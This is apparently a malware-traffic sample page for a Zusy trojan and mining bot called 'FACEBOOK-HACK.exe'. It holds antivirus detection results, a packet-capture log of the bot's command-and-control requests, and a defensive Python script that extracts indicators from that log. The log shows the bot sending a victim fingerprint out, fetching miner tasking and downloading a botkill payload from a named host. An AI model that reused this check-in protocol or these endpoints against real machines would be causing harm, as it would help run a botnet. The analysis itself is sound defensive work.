FACEBOOK-HACK.exe Zusy Malware Trojan Bitcoin Cryptocurrency Miner Botnet PCAP File Download Traffic Sample

Attachment: 1 pcap (httpbuilder), 92 KB, added May 9, 2017 by admin.
SHA256: b70dea97af65d741ef77006df77ff0c1ed4acb2dc592885195840c07878a9b1b
File name: FACEBOOK-HACK.exe
Detection ratio: 44 / 61
Analysis date: 2017-05-09 01:30:10 UTC

Detections (partial list, alphabetical through F-Secure):

Antivirus                 Result                                        Update
Ad-Aware                  Gen:Variant.Zusy.2105                         20170509
AegisLab                  Troj.W32.Generic!c                            20170509
ALYac                     Gen:Variant.Zusy.2105                         20170509
Arcabit                   Trojan.Zusy.D839                              20170509
Avast                     Win32:Malware-gen                             20170509
AVG                       MSIL11.AXSK                                   20170509
Avira (no cloud)          BDS/Backdoor.Gen                              20170509
AVware                    Trojan.Win32.Generic!BT                       20170508
Baidu                     Win32.Trojan.WisdomEyes.16070401.9500.9999    20170503
BitDefender               Gen:Variant.Zusy.2105                         20170509
CAT-QuickHeal             Trojan.Megalodon.A3                           20170508
ClamAV                    Win.Packed.Confuser-6042561-0                 20170508
CrowdStrike Falcon (ML)   malicious_confidence_100% (W)                 20170130
DrWeb                     Trojan.DownLoader24.55659                     20170508
Emsisoft                  Gen:Variant.Zusy.2105 (B)                     20170508
Endgame                   malicious (high confidence)                   20170503
ESET-NOD32                a variant of MSIL/Agent.QUI                   20170509
F-Secure                  Gen:Variant.Zusy.2105                         20170508

The MSIL names from AVG and ESET together with ClamAV's Win.Packed.Confuser hit indicate a .NET executable obfuscated with Confuser, so the static indicators above are for the packed sample, not the unpacked bot.

Capture excerpt (tcpdump summary lines followed by each HTTP request's headers; infected host 192.168.1.102, zunzail.livehost.fr served from 178.32.102.34):

2017-05-08 19:32:07.136203 IP 192.168.1.102.54461 > 178.32.102.34.80: Flags [P.], seq 0:412, ack 1, win 256, length 412: HTTP: GET /d/FACEBOOK-HACK.exe HTTP/1.1
GET /d/FACEBOOK-HACK.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: zunzail.livehost.fr
Connection: Keep-Alive

2017-05-08 19:32:15.600677 IP 192.168.1.102.64438 > 75.75.75.75.53: 23273+ A? zunzail.livehost.fr. (37)
2017-05-08 19:32:15.776645 IP 192.168.1.102.54462 > 178.32.102.34.80: Flags [S], seq 3848081592, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-05-08 19:32:15.886198 IP 192.168.1.102.54462 > 178.32.102.34.80: Flags [.], ack 3015686387, win 256, length 0
2017-05-08 19:32:15.887357 IP 192.168.1.102.54462 > 178.32.102.34.80: Flags [P.], seq 0:73, ack 1, win 256, length 73: HTTP: GET /LB5/ HTTP/1.1
GET /LB5/ HTTP/1.1
Host: zunzail.livehost.fr
Connection: Keep-Alive

2017-05-08 19:32:16.036363 IP 192.168.1.102.54462 > 178.32.102.34.80: Flags [.], ack 2921, win 256, length 0
2017-05-08 19:32:16.037348 IP 192.168.1.102.54462 > 178.32.102.34.80: Flags [.], ack 5841, win 256, length 0
2017-05-08 19:32:16.038033 IP 192.168.1.102.54462 > 178.32.102.34.80: Flags [.], ack 8761, win 256, length 0
2017-05-08 19:32:16.038456 IP 192.168.1.102.54462 > 178.32.102.34.80: Flags [.], ack 9772, win 252, length 0
2017-05-08 19:32:16.095815 IP 192.168.1.102.54462 > 178.32.102.34.80: Flags [P.], seq 73:131, ack 9772, win 252, length 58: HTTP: GET /LB5/login.php HTTP/1.1
GET /LB5/login.php HTTP/1.1
Host: zunzail.livehost.fr

2017-05-08 19:32:16.236113 IP 192.168.1.102.54462 > 178.32.102.34.80: Flags [.], ack 11378, win 256, length 0
2017-05-08 19:32:16.286007 IP 192.168.1.102.54462 > 178.32.102.34.80: Flags [.], ack 11383, win 256, length 0
2017-05-08 19:32:16.778606 IP 192.168.1.102.64439 > 75.75.75.75.53: 17557+ A? checkip.amazonaws.com. (39)
2017-05-08 19:32:16.806707 IP 192.168.1.102.54463 > 50.19.97.123.80: Flags [S], seq 521546646, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-05-08 19:32:16.847368 IP 192.168.1.102.54463 > 50.19.97.123.80: Flags [.], ack 3773245444, win 64240, length 0
2017-05-08 19:32:16.847976 IP 192.168.1.102.54463 > 50.19.97.123.80: Flags [P.], seq 0:71, ack 1, win 64240, length 71: HTTP: GET / HTTP/1.1
GET / HTTP/1.1
Host: checkip.amazonaws.com
Connection: Keep-Alive

2017-05-08 19:32:16.887624 IP 192.168.1.102.54463 > 50.19.97.123.80: Flags [.], ack 138, win 64103, length 0
2017-05-08 19:32:16.890334 IP 192.168.1.102.54462 > 178.32.102.34.80: Flags [P.], seq 131:403, ack 11383, win 256, length 272: HTTP: GET /LB5/bot/check.php?hwid=0FABFBFF0001067A&ip=76.111.8.85&os=Microsoft%20Windows%207%20Starter%20&name=WIN-F7076KTQ1P5&ram=1&cpu=Intel(R)%20Core(TM)2%20Quad%20CPU%20%20%20%20Q8300%20%20@%202.50GHz&gpu=VMware%20SVGA%203D&av=Unknown HTTP/1.1
GET /LB5/bot/check.php?hwid=0FABFBFF0001067A&ip=76.111.8.85&os=Microsoft%20Windows%207%20Starter%20&name=WIN-F7076KTQ1P5&ram=1&cpu=Intel(R)%20Core(TM)2%20Quad%20CPU%20%20%20%20Q8300%20%20@%202.50GHz&gpu=VMware%20SVGA%203D&av=Unknown HTTP/1.1
Host: zunzail.livehost.fr

2017-05-08 19:32:17.082854 IP 192.168.1.102.54462 > 178.32.102.34.80: Flags [.], ack 11784, win 255, length 0
2017-05-08 19:32:17.085557 IP 192.168.1.102.54462 > 178.32.102.34.80: Flags [P.], seq 403:473, ack 11784, win 255, length 70: HTTP: GET /LB5/bot/miner.php?check=1 HTTP/1.1
GET /LB5/bot/miner.php?check=1 HTTP/1.1
Host: zunzail.livehost.fr

2017-05-08 19:32:17.159157 IP 192.168.1.102.54464 > 178.32.102.34.80: Flags [S], seq 2327510108, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-05-08 19:32:17.233629 IP 192.168.1.102.54462 > 178.32.102.34.80: Flags [.], ack 12191, win 253, length 0
2017-05-08 19:32:17.234583 IP 192.168.1.102.54462 > 178.32.102.34.80: Flags [P.], seq 473:535, ack 12191, win 253, length 62: HTTP: GET /LB5/bot/miner.php HTTP/1.1
GET /LB5/bot/miner.php HTTP/1.1
Host: zunzail.livehost.fr

2017-05-08 19:32:17.269497 IP 192.168.1.102.54464 > 178.32.102.34.80: Flags [.], ack 4094637492, win 256, length 0
2017-05-08 19:32:17.270126 IP 192.168.1.102.54464 > 178.32.102.34.80: Flags [P.], seq 0:68, ack 1, win 256, length 68: HTTP: GET /LB5/out/bin/botkill.bin HTTP/1.1
GET /LB5/out/bin/botkill.bin HTTP/1.1
Host: zunzail.livehost.fr

2017-05-08 19:32:17.315772 IP 192.168.1.102.54461 > 178.32.102.34.80: Flags [F.], seq 412, ack 15623, win 252, length 0
2017-05-08 19:32:17.376690 IP 192.168.1.102.54462 > 178.32.102.34.80: Flags [.], ack 12653, win 251, length 0
2017-05-08 19:32:17.442867 IP 192.168.1.102.54462 > 178.32.102.34.80: Flags [P.], seq 535:616, ack 12653, win 251, length 81: HTTP: GET /LB5/bot/do.php?hwid=0FABFBFF0001067A HTTP/1.1
GET /LB5/bot/do.php?hwid=0FABFBFF0001067A HTTP/1.1
Host: zunzail.livehost.fr
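A triage script for the check-in sequence in the capture above, added here as an example; it is not code from the original page or from the malware. It parses tcpdump summary lines plus the Host header that follows each request (the shape `tcpdump -nn -tttt -A` produces), decodes the fingerprint the bot sends to /bot/check.php, and turns the flow into an IOC list with the reasons for the verdict. LB5_BOT_PATHS and the function names are this example's own; the sample lines are a constructed subset copied from the capture. Two things worth keying detections on: the bot's own requests carry nothing but a Host header (the 58-byte /LB5/login.php request is exactly the request line plus Host), unlike the dropper download that used an Internet Explorer 8 User-Agent, and the checkip.amazonaws.com lookup lands immediately before the check-in that reports `ip=76.111.8.85`, the public address rather than the 192.168.1.102 source seen in the capture.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample: tcpdump summary lines and the Host header that follows
# each request, copied from the capture above (a subset of the flows).
SAMPLE = """\
2017-05-08 19:32:07.136203 IP 192.168.1.102.54461 > 178.32.102.34.80: Flags [P.], seq 0:412, ack 1, win 256, length 412: HTTP: GET /d/FACEBOOK-HACK.exe HTTP/1.1
Host: zunzail.livehost.fr
2017-05-08 19:32:15.600677 IP 192.168.1.102.64438 > 75.75.75.75.53: 23273+ A? zunzail.livehost.fr. (37)
2017-05-08 19:32:15.776645 IP 192.168.1.102.54462 > 178.32.102.34.80: Flags [S], seq 3848081592, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-05-08 19:32:16.095815 IP 192.168.1.102.54462 > 178.32.102.34.80: Flags [P.], seq 73:131, ack 9772, win 252, length 58: HTTP: GET /LB5/login.php HTTP/1.1
Host: zunzail.livehost.fr
2017-05-08 19:32:16.778606 IP 192.168.1.102.64439 > 75.75.75.75.53: 17557+ A? checkip.amazonaws.com. (39)
2017-05-08 19:32:16.847976 IP 192.168.1.102.54463 > 50.19.97.123.80: Flags [P.], seq 0:71, ack 1, win 64240, length 71: HTTP: GET / HTTP/1.1
Host: checkip.amazonaws.com
2017-05-08 19:32:16.890334 IP 192.168.1.102.54462 > 178.32.102.34.80: Flags [P.], seq 131:403, ack 11383, win 256, length 272: HTTP: GET /LB5/bot/check.php?hwid=0FABFBFF0001067A&ip=76.111.8.85&os=Microsoft%20Windows%207%20Starter%20&name=WIN-F7076KTQ1P5&ram=1&cpu=Intel(R)%20Core(TM)2%20Quad%20CPU%20%20%20%20Q8300%20%20@%202.50GHz&gpu=VMware%20SVGA%203D&av=Unknown HTTP/1.1
Host: zunzail.livehost.fr
2017-05-08 19:32:17.085557 IP 192.168.1.102.54462 > 178.32.102.34.80: Flags [P.], seq 403:473, ack 11784, win 255, length 70: HTTP: GET /LB5/bot/miner.php?check=1 HTTP/1.1
Host: zunzail.livehost.fr
2017-05-08 19:32:17.270126 IP 192.168.1.102.54464 > 178.32.102.34.80: Flags [P.], seq 0:68, ack 1, win 256, length 68: HTTP: GET /LB5/out/bin/botkill.bin HTTP/1.1
Host: zunzail.livehost.fr
2017-05-08 19:32:17.442867 IP 192.168.1.102.54462 > 178.32.102.34.80: Flags [P.], seq 535:616, ack 12653, win 251, length 81: HTTP: GET /LB5/bot/do.php?hwid=0FABFBFF0001067A HTTP/1.1
Host: zunzail.livehost.fr
"""

SUMMARY_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d+) IP "
    r"(?P<src>[\d.]+)\.(?P<sport>\d+) > (?P<dst>[\d.]+)\.(?P<dport>\d+): (?P<rest>.*)$"
)
HTTP_RE = re.compile(r"HTTP: (?P<method>[A-Z]+) (?P<uri>\S+) HTTP/1\.[01]")
DNS_RE = re.compile(r"\d+\+ A\? (?P<qname>[\w.-]+?)\.? \(\d+\)")
# Bot endpoints of the LB5 panel as seen in the capture (this example's own list).
LB5_BOT_PATHS = ("/bot/check.php", "/bot/miner.php", "/bot/do.php", "/out/bin/botkill.bin")

def parse_tcpdump(text):
    """Turn tcpdump summary lines into HTTP and DNS events; bare TCP segments are skipped."""
    events = []
    for line in text.splitlines():
        m = SUMMARY_RE.match(line)
        if m:
            ev = {"ts": m["ts"], "src": m["src"], "dst": m["dst"],
                  "sport": int(m["sport"]), "dport": int(m["dport"])}
            h, d = HTTP_RE.search(m["rest"]), DNS_RE.search(m["rest"])
            if h:
                ev.update(kind="http", method=h["method"], uri=h["uri"], host=None)
            elif d:
                ev.update(kind="dns", qname=d["qname"])
            else:
                continue  # SYN/ACK-only segments carry nothing we key on
            events.append(ev)
        elif line.startswith("Host:") and events and events[-1]["kind"] == "http":
            events[-1]["host"] = line.split(":", 1)[1].strip()  # header line under the request
    return events

def checkin_profile(uri):
    """Decode the victim fingerprint the bot sends in the /bot/check.php query string."""
    q = parse_qs(urlsplit(uri).query, keep_blank_values=True)
    return {k: v[0].strip() for k, v in q.items()}

def triage(events):
    """Collect IOCs from the flow and record why it matches the LB5 bot protocol."""
    iocs = {"c2_hosts": set(), "c2_ips": set(), "uris": [], "hwid": None,
            "reported_public_ip": None, "profile": None, "reasons": []}

    def note(reason):
        if reason not in iocs["reasons"]:
            iocs["reasons"].append(reason)

    for ev in events:
        if ev["kind"] != "http":
            continue
        if ev["host"] == "checkip.amazonaws.com":
            note("public IP looked up via checkip.amazonaws.com before the check-in")
        path = urlsplit(ev["uri"]).path
        if not path.endswith(LB5_BOT_PATHS):
            continue
        iocs["c2_ips"].add(ev["dst"])
        if ev["host"]:
            iocs["c2_hosts"].add(ev["host"])
        iocs["uris"].append(ev["uri"])
        if path.endswith("/bot/check.php"):
            prof = checkin_profile(ev["uri"])
            iocs.update(profile=prof, hwid=prof.get("hwid"), reported_public_ip=prof.get("ip"))
            note("host fingerprint (hwid, os, name, ram, cpu, gpu, av) sent to /bot/check.php")
            if prof.get("ip") and prof["ip"] != ev["src"]:
                note("ip= is the public (NAT) address, not the capture's source address")
            if "VMware" in prof.get("gpu", ""):
                note("gpu=VMware reported: the bot ran in a VM without evading")
        elif path.endswith("/bot/miner.php"):
            note("miner tasking fetched from /bot/miner.php")
        elif path.endswith("/out/bin/botkill.bin"):
            note("botkill payload fetched")
        elif iocs["hwid"] and iocs["hwid"] in ev["uri"]:
            note("command poll to /bot/do.php reuses the check-in hwid")
    return iocs

def is_lb5_checkin(iocs):
    """Verdict: a hwid was registered and at least one more bot endpoint was hit."""
    return iocs["hwid"] is not None and len(iocs["uris"]) >= 2

if __name__ == "__main__":
    res = triage(parse_tcpdump(SAMPLE))
    print("LB5 check-in:", is_lb5_checkin(res), sorted(res["c2_hosts"]), sorted(res["c2_ips"]))
    print("hwid:", res["hwid"], "public ip:", res["reported_public_ip"], res["reasons"])
```

Run it as-is to see the verdict and reasons for the constructed sample; for the full capture, pipe in `tcpdump -nn -tttt -A -r <file.pcap>` output, which prints the Host header on its own line under each request exactly as the parser expects.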